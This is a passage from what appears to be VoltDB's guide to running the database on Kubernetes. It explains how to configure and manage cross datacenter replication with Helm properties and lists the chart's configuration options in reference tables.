other.\n6.1. Requirements for XDCR in Kubernetes\nOnce established, XDCR in Kubernetes works the same way it does in any other network environment, as\ndescribed in the chapter on Database Replication in the Using VoltDB guide. The key difference when using\nXDCR in Kubernetes is how you establish the initial connection between the clusters. Unlike traditional\nservers with known IP addresses, in Kubernetes network addresses are assigned on the fly and are not\nnormally accessible outside individual namespaces or regions. Therefore, you must do additional work to\ncreate the appropriate network relationships. Specifically, you must:\n•Establish a network mesh between the Kubernetes clusters containing the VoltDB databases so that\nthe nodes of each VoltDB cluster can identify and resolve the IP addresses and ports of all the nodes\nfrom the other VoltDB clusters.\n•Configure the VoltDB clusters , including properties that identify the type of mesh involved and mesh-\nspecific annotations that determine what network addresses and ports to use.\nThe following sections describe the different approaches to establishing a network mesh and how to con-\nfigure the clusters in each case.\n6.2. Choosing How to Establish a Network Mesh\nFor XDCR to work, each cluster must be able to identify and connect to the nodes of the other cluster.\nEstablishing the XDCR relationship occurs in two distinct phases:\n24Cross Datacenter Repli-\ncation in Kubernetes\n1.Network Discovery — First, the clusters connect over the replication port (port 5555, by default). The\ninitial connection confirms that the configurations are compatible, that the schema of the two clusters\nmatch for all DR tables, and that there is data in only one of the clusters.\n2.Replication — Once the clusters agree on the schema, each cluster sends a list of node IP addresses and\nports to the other cluster and multiple connections are made, node-to-node, between the two clusters.\nIf there is existing data, a synchronization snapshot is sent between the clusters and then replication\nbegins.\nFor the network discovery phase, each cluster must have a clearly identifiable network address that the\nother cluster can specify as part of its XDCR configuration. For the replication phase, each cluster must\nhave externally reachable network addresses for each node in the cluster that it can advertise during the\ndiscovery phase and that the other cluster uses to make the necessary connections for replication.\nSince, by default, the ports on a Kubernetes pod are not externally accessible, you must use additional\nservices to make the VoltDB nodes accessible. Three such options are:\n•Kubernetes Load Balancers — One way to establish a network mesh is to use the built-in load balancer\nservice within Kubernetes. Load balancers provide a defined, persistent external interface for internal\npods. The advantage of using load balancers is that they are a native component of Kubernetes and\nare easy to configure. The disadvantage is that if you are running your VoltDB clusters in a hosted\nenvironment, load balancers tend to be far more expensive than regular pods and creating a separate\nload balancer for each node in the cluster to handle the replication phase can be prohibitively expensive\nunless you are managing your own infrastructure.\n•Kubernetes Node Ports — An alternative to load balancers is using node ports. Node ports, like load\nbalancers, are native services of Kubernetes and provide an externally accessible interface for the inter-\nnal pods. However, unlike load balancers where the addresses are persistent over time, node ports take\non the addresses of the underlying Kubernetes nodes and therefore can change as Kubernetes nodes\nare recycled. Therefore node ports are not appropriate for the Network Discovery phase. On the other\nhand, they can be a cheaper alternative to load balancers for the replication phase, since the cluster can\nadvertise the current set of node port addresses as pods come and go.\n•Network Mesh Services — These additional services, such as Consul, create a network mesh between\nKubernetes clusters and regions. They essentially act as a virtual private network (VPN) within Kuber-\nnetes so the VoltDB clusters can interoperate as if they were local to each other. The advantage of us-\ning network mesh services is that configuring the VoltDB clusters is simpler, since all of the network\ntopology is handled separately. The deficit is that this requires yet another service to set up. And the\nconfiguration of these services can be quite complex, requiring a deep understanding of — and access\nto — the networking layer in Kubernetes.\nWhich networking solution you use is up to you. You can even mix and match the alternatives — using,\nfor example, a single load balancer per cluster for the Network Discovery phase and individual node ports\nfor each VoltDB cluster node during the replication phase.\nYou define the type of network mesh to use and how to connect using YAML properties when you config-\nure your clusters. In general, the Helm properties starting with cluster.config.deployment.dr ,\nsuch as id and role, are generic properties common to all XDCR implementations. Helm properties\nstarting with cluster.serviceSpec define the type of network mesh to use and annotations specific\nto the network type.\nThe following sections explain how to configure XDCR using Helm properties, with individual sections\ndiscussing the differences necessary for various networking options, including:\n•Common XDCR Properties\n•Configuring XDCR in Local Namespaces\n25Cross Datacenter Repli-\ncation in Kubernetes\n•Configuring XDCR Using Load Balancers\n•Configuring XDCR Using Node Ports for Replication\n•Configuring XDCR Using Network Services\n6.3. Common XDCR Properties\nNo matter what approach you choose for establishing the network mesh, you must first configure the\nclusters as members of the XDCR quorum the same way you do on bare metal. That is, you must assign:\n•A unique DR ID for each cluster between 0 and 127\n•The cluster role (XDCR)\n•At least one node from the other cluster as the point of connection for the Network Discovery phase\nOn traditional servers these properties are defined in an XML configuration file. On Kubernetes, you spec-\nify the configuration using YAML properties. The following table shows two equivalent XDCR configu-\nrations in the different formats.\nXML Configuration File YAML Configuration File\n<dr id=\"1\" role=\"xdcr\" >\n <connection \n source=\"brooklyn.mycorp.lan\" />\n</dr>cluster:\n config:\n deployment:\n dr:\n id: 1\n role: xdcr\n connection:\n enabled: true\n source: \\\n \"brooklyn-voltdb-cluster-dr:5555\" \n6.4. Configuring XDCR in Local Namespaces\nThe easiest way to configure XDCR clusters is when the VoltDB clusters are within the same Kubernetes\nnamespace or cluster. In this case, the cluster IP addresses are all locally visible and so do not need any\nadditional network setup. The only special XDCR configuration necessary is providing the address of a\nreplication port from one node of the remote cluster as the source property.\nIn Kubernetes the cluster nodes are assigned unique host names based on the initial Helm release name (that\nis, the name you assigned the cluster when you installed it). The VoltDB Operator also creates services that\nabstract the individual server addresses and provide a single entry point for specific ports on the database\ncluster. The two services of interest are DR and client, which will direct traffic to the corresponding port\n(5555 or 21212 by default) on an arbitrary node of the cluster. If the two database instances are within the\nsame Kubernetes cluster, you can use the DR service to make the initial connection between the database\nsystems, as shown in the following YAML configuration file.\nIf the databases are running in different namespaces, you will need to specify the fully qualified service\nname as the connection source in the configuration, which includes the namespace. So, for example, if the\nmanhattan database is in namespace ny1 and brooklyn is in ny2, the YAML configuration files related to\nXDCR for the two clusters would be the following.\nManhattan Cluster\n26Cross Datacenter Repli-\ncation in Kubernetes\ncluster:\n config:\n deployment:\n dr:\n id: 1\n role: xdcr\n connection:\n enabled: true\n source: \"brooklyn-voltdb-cluster-dr.ny2.svc.cluster.local:5555\"\nBrooklyn Cluster\ncluster:\n config:\n deployment:\n dr:\n id: 2\n role: xdcr\n connection:\n enabled: true\n source: \"manhattan-voltdb-cluster-dr.ny1.svc.cluster.local:5555\"\n6.5. Configuring XDCR Using Load Balancers\nKubernetes load balancers are an alternative for making VoltDB clusters accessible outside the Kubernetes\ncluster or region they are in. In this case you are not using load balancers for their traditional role, balancing\nthe load between multiple pods. Instead, the load balancers are solely used to provide externally accessible\nIP addresses.\nThere are two approaches to using load balancers. The first approach is to assign a load balancer for\neach node of the cluster. Since the nodes are externally reachable through persistent IP addresses on their\ncorresponding load balancer, the load balancers can be used for both the network discovery and replication\nphases. The second approach is to use only one load balancer for the entire cluster to provide network\ndiscovery, and use virtual network peering, available from your hosting provider, for replication.\nMany hosting platforms, such as Google Cloud or AWS, provide proprietary mechanisms for performing\nnetwork peering between regions or data centers. Each of these solutions has its own unique set up and\nconfiguration, separate from the configuration of VoltDB and the VoltDB Operator . As a result, using a\nnetwork peering service is not as simple as the use of load balancers for replication. However, they can be\nsignificantly more cost effective when paired with a single load balancer for network discovery.\nThere is also the choice of assigning the IP addresses for the load balancers dynamically, or having them\nselected from a range of static addresses. Dynamic assignment is simpler, since you do not need to arrange\nwith your hosting provider for pre-assigned IPs or hostnames. However, dynamic addresses also mean you\ndo not know what the addresses are until the cluster starts . This means the remote XDCR cluster cannot\nassign the source property until after the cluster starts with its associated load balancers and you can\ndetermine the IP addresses assigned to them.\n6.5.1. Separate Load Balancers For Each Node (cluster.ser-\nviceSpec.perpod)\nFirst you must assign the DR id and role as Helm properties. If the remote cluster is using static ad-\ndresses, you can specify one of its nodes as the source, as in the following example. If you are using\n27Cross Datacenter Repli-\ncation in Kubernetes\ndynamic load balancers, leave the source property blank and use the helm upgrade --set command once\nthe clusters are running to assign a resulting node address for the remote cluster.\ncluster:\n config:\n deployment:\n dr:\n id: 1\n role: xdcr\n connection:\n enabled: true\n source: \"chicago-dc-2\" # Remote cluster\nThen in the cluster.serviceSpec section, you enable perpod by setting its type to LoadBal-\nancer. You will also want to set the dr.enabled property to true so the per pod load balancers are used\nfor network discovery as well as replication.\nFor dynamically assigned addresses, set the publicIPFromService to true:\ncluster:\n serviceSpec:\n perpod:\n type: LoadBalancer\n publicIPFromService: true\n dr:\n enabled: true\nFor static IP addresses, use the staticIPs property to specify the addresses to assign when creating the\nload balancers and, again, set dr.enabled to true.\ncluster:\n serviceSpec:\n perpod: \n enabled: true\n type: LoadBalancer\n staticIPs:\n - 12.34.56.78\n - 12.34.56.79\n - 12.34.56.80\n dr:\n enabled: true\n6.5.2. Single Load Balancer For Discovery with Virtual Net-\nworking Peering (cluster.serviceSpec.dr)\nTo reduce the number of resources needed to connect XDCR clusters in different regions, you can use\na single load balancer for network discovery and use virtual network peering services from your hosting\nprovider for connecting the two clusters during replication. How you set up and configure your network\npeering is specific to each provider. See your provider's documentation for additional information. This\nsection describes how to set up a single Kubernetes load balancer for network discovery once you have\nyour network peering established.\nFirst you must assign the DR id and role as Helm properties and, if known in advance, the source\nfor the remote cluster:\n28Cross Datacenter Repli-\ncation in Kubernetes\ncluster:\n config:\n deployment:\n dr:\n id: 1\n role: xdcr\n connection:\n enabled: true\n source: \"chicago-dc-2\" # Remote cluster\nThen in the cluster.serviceSpec section, you enable the dr service (rather than perpod) and\nset its type to LoadBalancer . You may also need to provide additional annotations that help configure\nthe service. These annotations are specific to the host environment you are using. So, for example, the\nfollowing configuration provides annotations for AWS and the Google Cloud:\ncluster:\n serviceSpec:\n dr: \n enabled: true\n type: LoadBalancer\n annotations:\n # Google Cloud\n networking.gke.io/load-balancer-type: \"Internal\"\n networking.gke.io/internal-load-balancer-allow-global-access: \"true\"\n # AWS\n service.beta.kubernetes.io/aws-load-balancer-internal: \"true\"\n service.beta.kubernetes.io/aws-load-balancer-type: \"nlb\"\n6.6. Configuring XDCR Using Node Ports for Repli-\ncation\nKubernetes node ports are another option for providing external access to the VoltDB cluster for replica-\ntion. Node ports are similar to load balancers in that they provide an externally accessible network address\nfor individual ports. Node ports are different in that the addresses are transitory — the address and/or port\nnumber will change as pods come and go. So node ports are less practical for the Network Discovery\nphase. However, they can be a cheap alternative for providing external access during the replication phase,\nsince the cluster can advertise the new addresses as its topology changes.\nIt is also possible to mix and match solutions. So a single load balancer can be used to provide the Network\nDiscovery service for a cluster, while node ports provide per pod network addresses for the replication\nphase, as described next.\nAgain, you start by assigning the DR id and role as Helm properties and, if known in advance, the\nsource for the remote cluster:\ncluster:\n config:\n deployment:\n dr:\n id: 1\n role: xdcr\n connection:\n29Cross Datacenter Repli-\ncation in Kubernetes\n enabled: true\n source: \"chicago-dc-2\" # Remote cluster\nYou then define the load balancer for Network Discovery by setting the values of the cluster.ser-\nviceSpec.dr properties enabled to true and type to LoadBalancer .\ncluster:\n serviceSpec:\n dr:\n enabled: true\n type: LoadBalancer\nFinally, define the replication phase as using node ports by configuring cluster.ser-\nviceSpec.perpod properties type to NodePort and dr.enabled to true. You can also use the\ndr.startReplicationNodePort property to specify the starting port number for the externally\naccessible ports assigned to the node ports.\ncluster:\n serviceSpec:\n perpod:\n type: NodePort\n dr:\n enabled: true\n startReplicationNodePort: 33111\n6.7. Configuring XDCR Using Network Services\nThe goal of network services, such as Consul, is to make Kubernetes pods in different clusters or regions\nappear as if they were local to each other. This makes configuring XDCR within VoltDB itself easier; in\nmost cases it is almost identical to how you configure clusters within local namespaces. However, how\nyou configure the network service itself is very dependent on which service you are using and the hosting\nenvironment in which you are operating.\nUsing Consul as an example, Consul provides a \"sidecar\" — an additional process running in the same\npod as the VoltDB process — that makes remote pods and clusters appear to be local to the pod itself.\nSo rather than providing a remove IP address and port as the source for XDCR Network Discovery, you\nspecify a local port. For example:\ncluster:\n config:\n deployment:\n dr:\n id: 1\n role: xdcr\n connection:\n enabled: true\n source: \"localhost:4444\"\nWhat port you specify and how you configure and start Consul and the Consul sidecar, is specific to the\nConsul product and your implementation of it. The same is true when using other third-party networking\nservices. You may also need to provide additional annotations within the Helm configuration to complete\nthe network setup, depending upon which network service you use. For example:\ncluster:\n clusterSpec:\n30Cross Datacenter Repli-\ncation in Kubernetes\n additionalAnnotations:\n \"consul.hashicorp.com/connect-service\": \"chicago-voltdb-cluster\"\n \"consul.hashicorp.com/connect-service-upstreams\": \"chicago-voltdb-cluster:5554:illinois\"\nSee the product documentation for the specific service for further information.\n31Chapter 7. Managing XDCR Clusters in\nKubernetes\nOnce you have configured your XDCR clusters and your network environment, you are ready to start the\nclusters. You begin by starting two of the clusters. (Remember, only one of the clusters can have data in the\nDR tables before the XDCR communication begins.) Once the schema of the DR tables in two databases\nmatch, synchronization starts. After the initial two databases are synchronized, you can start additional\nXDCR clusters, one at a time.\nThere are several management procedures that help keep the clusters in sync, especially when shutting\ndown or removing clusters from the XDCR environment. In other environments, these procedures use\nvoltadmin commands, such as shutdown , dr drop and dr reset. In Kubernetes, you execute these pro-\ncedures through the VoltDB Operator using Helm properties. Activities include:\n•Removing a cluster temporarily\n•Removing a cluster permanently\n•Resetting XDCR when a cluster is lost\n•Rejoining a cluster that was removed\n7.1. Removing a Cluster Temporarily\nIf you want to remove a cluster from the XDCR environment temporarily, you simply shutdown the cluster\nnormally, by setting the number of replicas to zero. This way, when the cluster restarts, the command\nlogs will take care of recovering all of the data and re-establishing the XDCR \"conversations\" with the\nother clusters:\n--set cluster.clusterSpec.replicas=0\n7.2. Removing a Cluster Permanently\nIf you want to remove a cluster from the XDCR environment permanently, you want to make sure it sends\nall of its completed transactions to the other clusters before it shuts down. You do this by setting the DR\nrole to \"none\" to perform an orderly shutdown:\n--set cluster.config.deployment.dr.role=\"none\"\n--set cluster.clusterSpec.replicas=0\nOf course, you do not have to shut the cluster down. You can simply remove it from the XDCR environ-\nment. Note that if you do so, the data in the current cluster will diverge from those clusters still participat-\ning in XDCR. So only do this if you are sure you want to maintain a detached copy of the data:\n--set cluster.config.deployment.dr.role=\"none\"\nFinally, if you cannot perform an orderly removal from XDCR — for example, if one of the other clusters\nis offline or if sending the outstanding transactions will take too long and you are willing to lose that data\n— you can set the property cluster.clusterSpec.dr.forceDrop to \"TRUE\" to force the cluster\nto drop out of the XDCR mesh without finalizing its XDCR transfers. Once the cluster has been removed,\nit is advisable to reset this property to \"FALSE\" so future procedures revert to the orderly approach of\nflushing the queues.\n32Managing XDCR Clus-\nters in Kubernetes\n--set cluster.clusterSpec.dr.forceDrop=TRUE\n--set cluster.config.deployment.dr.role=\"none\"\n--set cluster.clusterSpec.replicas=0\n . . .\n--set cluster.clusterSpec.dr.forceDrop=FALSE\n7.3. Resetting XDCR When a Cluster Leaves Unex-\npectedly\nNormally, when a cluster is removed from XDCR in an orderly fashion, the other clusters are notified that\nthe cluster has left the mesh. However, if a cluster leaves unexpectedly — for example, if it crashes or is\nshutdown and deleted without setting its role to \"none\" to notify the other clusters — the XDCR network\nstill thinks the cluster is a member and may return. As a result, the remaining clusters continue to save DR\nlogs for the missing member, using up unnecessary processing cycles and disk space. You need to reset\nthe XDCR network mesh to correct this situation.\nTo reset the mesh you notify the remaining clusters that the missing cluster is no longer a member. You do\nthis be adding the DR ID of the missing cluster to the cluster.clusterSpec.dr.excludeClus-\nters property. The property value is an array of DR IDs. For example, if the DR ID ( cluster.con-\nfig.deployment.dr.id ) of the lost cluster is \"3\", you set the property to \"{3}\":\n--set cluster.clusterSpec.dr.excludeClusters='{3}'\nYou must set this property for all of the clusters remaining in the XDCR environment. If later, you want\nto add the missing cluster (or another cluster with the same DR ID) back into the XDCR mesh, you will\nneed to reset this property. For example:\n--set cluster.clusterSpec.dr.excludeClusters=null\n7.4. Rejoining an XDCR Cluster That Was Previ-\nously Removed\nIf a cluster is removed from the XDCR cluster permanently, by resetting the DR role, or through exclusion\nby the other clusters, it is still possible to rejoin that cluster to the XDCR network. To do that you must\nreinitialize the cluster and, if it was forcibly excluded, remove the exclusion from the current members of\nthe network. (Note, the following procedure is not necessary if the cluster was removed temporarily by\nsetting the number of replicas to zero.)\nFirst, if the cluster was forcibly removed by exclusion, you must remove the exclusion from the current\nmembers of the XDCR network by clearing the cluster.clusterSpec.dr.excludeClusters\nproperty (removing the missing cluster's ID from the array):\n--set cluster.clusterSpec.dr.excludeClusters=null\nThen you must restart the cluster you want to rejoin, reinitializing the cluster's contents with the clus-\nter.clusterSpec.initForce property and setting the appropriate properties (such as the DR role\nand connection properties):\n--set cluster.clusterSpec.initForce=TRUE\n--set cluster.config.deployment.dr.role=\"xdcr\"\n--set cluster.clusterSpec.replicas=3\n33Managing XDCR Clus-\nters in Kubernetes\nOnce the cluster rejoins the XDCR network and synchronizes with the current members, be sure to reset\nthe cluster.clusterSpec.initForce property to false.\n34Appendix A. VoltDB Helm Properes\nYou communicate with the VoltDB Operator, and Kubernetes itself, through the Helm charts that VoltDB\nprovides. You can also specify additional Helm properties that customize what the Helm charts do. The\nproperties are hierarchical in nature and can be specified on the Helm command line either as one or more\nYAML files or as individual arguments. For example, you can specify multiple properties in a YAML file\nthen reference the file as part of your command using the --values or -f argument, like so:\n$ helm install mydb voltdb/voltdb --values myoptions.yaml\nOr you can specify the properties individually in dot notation on the command line using the --set flag,\nlike so:\n$ helm install mydb voltdb/voltdb \\\n --set cluster.clusterSpec.replicas=5 \\\n --set cluster.config.deployment.cluster.kfactor=2 \\\n --set cluster.config.deployment.cluster.sitesperhost=12\nFor arrays and lists, you can specify the values in dot notation by enclosing the list in braces and then\nquoting the command as required by the shell you are using. For example:\n$ helm upgrade mydb voltdb/voltdb -reuse-values\n --set cluster.clusterSpec.excludeClusters='{1,3}'\nIn YAML, you specify each element of the property on a separate line, following each parent element\nwith a colon, indenting each level appropriately, and following the last element with the value of the\nproperty . On the command line you specify the property with the elements separated by periods and the\nvalue following an equals sign. So in the preceding install example, the matching YAML file for the\ncommand line properties would look like this:\ncluster:\n clusterSpec:\n replicas: 5\n config:\n deployment:\n cluster:\n kfactor: 2\n sitesperhost: 12\nMany of the properties have default values; the following tables specify the default values where applic-\nable. You do not need to specify values for all of the properties. In fact, you can start a generic VoltDB\ndatabase specifying only the license file. Otherwise, you need only specify those properties you want to\ncustomize.\nFinally, the properties are processed in order and can be overridden. So if you specify different values\nfor the same property in two YAML files and as a command line argument, the latter YAML file setting\noverrides the first and the command line option overrides them both.\nA.1. How to Use the Properties\nThe following sections detail all of the pertinent Helm properties that you can specify when creating or\nmodifying the VoltDB Operator and its associated cluster. The properties are divided into categories and\neach category identified by the root elements common to all properties in that category:\n•Top-Level Kubernetes Options\n35VoltDB Helm Properties\n•Kubernetes Cluster Startup Options\n•Network Options\n•VoltDB Database Startup Options\n•VoltDB Database Configuration Options\nFor the sake of brevity and readability, the properties in the tables are listed by only the unique elements\nof the property after the root. However, when specifying a property in YAML or on the command line,\nyou must specify all elements of the full property name, including both the root and the unique elements.\nA.2. Top-Level Kubernetes Options\nThe following properties affect how Helm interacts with the Kubernetes infrastructure.\nTable A.1. Top-Level Options\nParameter Description Default\ncluster.enabled Create VoltDB Cluster true\ncluster.serviceAccount.create If true, create & use service ac-\ncount for VoltDB cluster node\ncontainerstrue\ncluster.serviceAccount.name If not set and create is true, a name\nis generated using the fullname\ntemplate\"\"\nA.3. Kubernetes Cluster Startup Options\nThe following properties affect the size and structure of the Kubernetes cluster that gets started, as well as\nthe startup attributes of the VoltDB cluster running on those pods.\nTable A.2. Options Starting with cluster.clusterSpec...\nParameter Description Default\n.replicas Pod (VoltDB Node) replica count,\nscaling to 0 will shutdown the\ncluster gracefully3\n.maxPodUnavailable Maximum pods unavailable in\nPod Disruption Budgetkfactor\n.maintenanceMode VoltDB Cluster maintenance\nmode (pause all nodes)false\n.takeSnapshotOnShutdown Takes a snapshot when clus-\nter is shut down by scaling to\n0. One of: NoCommandLogging\n(default), Always, Never. No-\nCommandLogging means 'snap-\nshot only if command logging is\ndisabled'.\"\"\n.initForce Always init --force on VoltDB\nnode start/restart. WARNING:false\n36VoltDB Helm Properties\nParameter Description Default\nThis will destroy VoltDB data on\nPVCs except snapshots.\n.deletePVC Delete and cleanup generated\nPVCs when VoltDBCluster is\ndeleted, requires finalizers to be\nenabled (on by default)false\n.allowRestartDuringUpdate Allow VoltDB cluster restarts if\nnecessary to apply user-request-\ned configuration changes. May in-\nclude automatic save and restore\nof database.false\n.stoppedNodes User-specified list of stopped\nnodes based on StatefulSet[ ]\n.additionalXDCRReadiness Add additional readiness checks\nusing XDCR to ensure both clus-\nters are healthy (WARNING:\nMay cause app downtime)false\n.persistentVolume.size Persistent Volume size per Pod\n(VoltDB Node)1Gi\n.persistentVolume\n.storageClassNameStorage Class name to use, other-\nwise use default\"\"\n.persistentVolume.hostpath\n.enabledUse HostPath volume for local\nstorage of VoltDB. This node stor-\nage is often ephemeral and will\nnot use PVC storage classes if en-\nabled.false\n.persistentVolume.hostpath.path HostPath mount point, defaults\nto /data/voltdb/ if not specified.\"\"\n.ssl.certificateFile PEM encoded certificate chain\nused by the VoltDB operator\nwhen SSL/TLS is enabled\"\"\n.ssl.insecure If true, skip certificate verifica-\ntion by the VoltDB operator when\nSSL/TLS is enabledfalse\n.storageConfigs Optional storage configs for pro-\nvisioning additional persistent\nvolume claims automatically[ ]\n.additionalVolumes Additional list of volumes that can\nbe mounted by node containers[ ]\n.additionalVolumeMounts Pod volumes to mount into the\ncontainer's filesystem, cannot be\nmodified once set[ ]\n.image.registry Image registry docker.io\n.image.repository Image repository voltdb/voltdb-enterprise\n.image.tag Image tag 10.0.0\n.image.pullPolicy Image pull policy Always\n37VoltDB Helm Properties\nParameter Description Default\n.additionalStartArgs Additional VoltDB start com-\nmand args for the pod container[ ]\n.priorityClassName Pod priority defined by an existing\nPriorityClass\"\"\n.additionalAnnotations Additional custom Pod annota-\ntions{ }\n.additionalLabels Additional custom Pod labels { }\n.resources CPU/Memory resource re-\nquests/limits{ }\n.nodeSelector Node labels for pod assignment { }\n.tolerations Pod tolerations for Node assign-\nment[ ]\n.affinity Node affinity { }\n.podSecurityContext Pod security context {\"runAsNonRoot\":true,\n\"runAsUser\":1001,\n\"fsGroup\":1001}\n.securityContext Container security context.\nWARNING: Changing user or\ngroup ID may prevent VoltDB\nfrom operating.{\"privileged\":false,\n\"runAsNonRoot\":true,\n\"runAsUser\":1001,\n\"runAsGroup\":1001,\n\"readOnlyRootFilesystem\":true}\n.clusterInit.initSecretRefName Name of pre-created Kuber-\nnetes secret containining init con-\nfiguration (deployment.xml, li-\ncense.xml and log4j.xml), ignores\ninit configuration if set\"\"\n.clusterInit\n.schemaConfigMapRefNameName of pre-created Kubernetes\nconfigmap containining schema\nconfiguration\"\"\n.clusterInit\n.classesConfigMapRefNameName of pre-created Kubernetes\nconfigmap containining schema\nconfiguration\"\"\n.podTerminationGracePeriodSe-\ncondsDuration in seconds the Pod needs\nto terminate gracefully. Defaults\nto 30 seconds if not specified.30\n.livenessProbe.enabled Enable/disable livenessProbe true\n.livenessProbe\n.initialDelaySecondsDelay before liveness probe is ini-\ntiated20\n.livenessProbe.periodSeconds How often to perform the probe 10\n.livenessProbe.timeoutSeconds When the probe times out 1\n.livenessProbe.failureThreshold Minimum consecutive failures for\nthe probe10\n.livenessProbe.successThreshold Minimum consecutive successes\nfor the probe1\n38VoltDB Helm Properties\nParameter Description Default\n.readinessProbe.enabled Enable/disable readinessProbe true\n.readinessProbe\n.initialDelaySecondsDelay before readiness probe is\ninitiated30\n.readinessProbe.periodSeconds How often to perform the probe 17\n.readinessProbe.timeoutSeconds When the probe times out 2\n.readinessProbe.failureThreshold Minimum consecutive failures for\nthe probe6\n.readinessProbe\n.successThresholdMinimum consecutive successes\nfor the probe1\n.startupProbe.enabled Enable/disable startupProbe, fea-\nture flag must also be enabled at\na cluster level (enabled by default\nin 1.18)true\n.startupProbe\n.initialDelaySecondsDelay before startup probe is ini-\ntiated45\n.startupProbe.periodSeconds How often to perform the probe 10\n.startupProbe.timeoutSeconds When the probe times out 1\n.startupProbe.failureThreshold Minimum consecutive failures for\nthe probe18\n.startupProbe.successThreshold Minimum consecutive successes\nfor the probe1\n.env.VOLTDB_OPTS VoltDB cluster additional java\nruntime options (VOLTDB_OP-\nTS)\"\"\n.env.VOLTDB_HEAPMAX VoltDB cluster heap size, integer\nnumber of megabytes (VOLTD-\nB_HEAPMAX)\"\"\n.env.VOLTDB_HEAPCOMMIT Commit VoltDB cluster heap\nat startup, true/false (VOLTD-\nB_HEAPCOMMIT)\"\"\n.env\n.VOLTDB_K8S_LOG_CONFIGVoltDB log4jcfg file path \"\"\n.customEnv Key-value map of additional\nenvvars to set in all VoltDB node\ncontainers{ }\n.dr.forceDrop Indicate if you want to drop clus-\nter from XDCR without producer\ndrain.false\n.dr.excludeClusters User-specified list of clusters not\npart of XDCR[ ]\nA.4. Network Options\nThe following properties specify what ports to use and the port-mapping protocol.\n39VoltDB Helm Properties\nTable A.3. Options Starting with cluster.serviceSpec...\nParameter Description Default\n.type VoltDB service type (options\nClusterIP, NodePort, and Load-\nBalancer)ClusterIP\n.externalTrafficPolicy VoltDB service external traffic\npolicy (options Cluster, Local)Cluster\n.vmcPort VoltDB Management Center web\ninterface Service port8080\n.vmcNodePort Port to expose VoltDB Manage-\nment Center service on each node,\ntype NodePort only31080\n.vmcSecurePort VoltDB Management Center se-\ncure web interface Service port8443\n.vmcSecureNodePort Port to expose VoltDB Manage-\nment Center secure service on\neach node, type NodePort only31443\n.adminPortEnabled Enable exposing admin port with\nthe VoltDB Servicetrue\n.adminPort VoltDB Admin exposed Service\nport21211\n.adminNodePort Port to expose VoltDB Admin ser-\nvice on each node, type NodePort\nonly31211\n.clientPortEnabled Enable exposing client port with\nthe VoltDB Servicetrue\n.clientPort VoltDB Client exposed service\nport21212\n.clientNodePort Port to expose VoltDB Client ser-\nvice on each node, type NodePort\nonly31212\n.loadBalancerIP VoltDB Load Balancer IP \"\"\n.loadBalancerSourceRanges VoltDB Load Balancer Source\nRanges[ ]\n.externalIPs List of IP addresses at which the\nVoltDB service is available[ ]\n.http.sessionAffinity SessionAffinity override for the\nHTTP serviceClientIP\n.http.sessionAffinityConfig\n.clientIP.timeoutSecondsTimeout override for http.session-\nAffinity=ClientIP10800\n.dr.type VoltDB DR service type, valid\noptions are ClusterIP (default),\nLoadBalancer, or NodePort\"\"\n.dr.annotations Additional custom Service anno-\ntations{ }\n40VoltDB Helm Properties\nParameter Description Default\n.dr.availableIPs[ ] (OBSOLETE as of 1.6.0) [ ]\n.dr.staticIP Single static IP for DR service use\nwhen creating LoadBalancers sin-\ngle DR service``\n.dr.enabled Create single DR service for DR false\n.dr.externalTrafficPolicy VoltDB DR service external traf-\nfic policy\"\"\n.dr.replicationPort VoltDB DR replication exposed\nService port5555\n.dr.replicationNodePort Voltdb DR port to expose VoltDB\nreplication service on each node,\ntype NodePort only31555\n.dr.servicePerPod (OBSOLETE as of 1.6.0) false\n.dr.publicIPFromService Operator will wait to get the pub-\nlic IP address from the service sta-\ntus set by Kubernetesfalse\n.dr.override Allows per-pod-service overrides\nof serviceSpec[ ]\n.dr.override[ ].podIndex (OBSOLETE as of 1.6.0) \"\"\n.dr.override[ ].annotations (OBSOLETE as of 1.6.0) \"\"\n.dr.override[ ].publicIP (OBSOLETE as of 1.6.0) \"\"\n.dr.override[ ].spec (OBSOLETE as of 1.6.0) { }\n.dr.override[ ].spec.type (OBSOLETE as of 1.6.0) \"\"\n.dr.override[ ].spec.loadBal-\nancerIP(OBSOLETE as of 1.6.0) \"\"\n.dr.override[ ].spec.externalIPs (OBSOLETE as of 1.6.0) [ ]\n.perpod.type VoltDB service type, valid op-\ntions are ClusterIP (default),\nLoadBalancer, or NodePort\"\"\n.perpod.publicIPFromService Operator will wait to get the pub-\nlic IP address from the service sta-\ntus set by Kubernetesfalse\n.perpod.staticIPs[ ] Available IPs and IP-ranges to use\nwhen creating LoadBalancers on a\nper-pod basis[ ]\n.perpod.dr.enabled Enable DR services on a per-pod\nbasisfalse\n.perpod.dr.replicationPort Voltdb DR port to expose VoltDB\nreplication service on each node,\ntype NodePort only5555\n.perpod.dr\n.startReplicationNodePortVoltdb DR node port to use\nfor VoltDB replication service on\neach node, type NodePort only.32555\n41VoltDB Helm Properties\nParameter Description Default\nStart port indicates starting port\nand each pod gets subsequent port\n.perpod.dr.externalTrafficPolicy VoltDB DR service external traf-\nfic policy for per pod DR services.\"\"\nA.5. VoltDB Database Startup Options\nThe following properties affect how Helm interacts with the VoltDB cluster adn specific initialization\noptions, such as the initial schema and procedure classes.\nTable A.4. Options Starting with cluster.config...\nParameter Description Default\n.auth.username User added for operator VoltDB\nAPI communication when hash\nsecurity is enabledvoltdb-operator\n.auth.password Password added for operator Volt-\nDB API communication when\nhash security is enabled\"\"\n.schemas Map of optional schema files con-\ntaining data definition statements{ }\n.classes Map of optional jar files container\nstored procedures{ }\n.licenseXMLFile VoltDB Enterprise license.xml { }\n.log4jcfgFile Custom Log4j configuration file { }\nA.6. VoltDB Database Configuration Options\nThe following properties define the VoltDB database configuration.\nTable A.5. Options Starting with cluster.config.deployment...\nParameter Description Default\n.cluster.kfactor K-factor to use for database dura-\nbility and data safety replication1\n.cluster.sitesperhost SitesPerHost for VoltDB Cluster 8\n.heartbeat.timeout Internal VoltDB cluster verifica-\ntion of presence of other nodes\n(seconds)90\n.partitiondetection.enabled Controls detection of network par-\ntitioningtrue\n.commandlog.enabled Command logging for database\ndurability (recommended)true\n.commandlog.logsize Command logging allocated disk\nspace (MB)1024\n42VoltDB Helm Properties\nParameter Description Default\n.commandlog.synchronous Transactions do not complete un-\ntil logged to diskfalse\n.commandlog.frequency.time How often the command log is\nwritten, by time (milliseconds)200\n.commandlog.frequency\n.transactionsHow often the commang log is\nwritten, by transaction command2147483647\n.dr.id Unique cluster id, 0-127 0\n.dr.role Role for this cluster, currently the\nonly accepted value is 'xdcr'xdcr\n.dr.conflictretention Automatic pruning of xdcr con-\nflict logs; value is integer fol-\nlowed by one of m/h/d, for 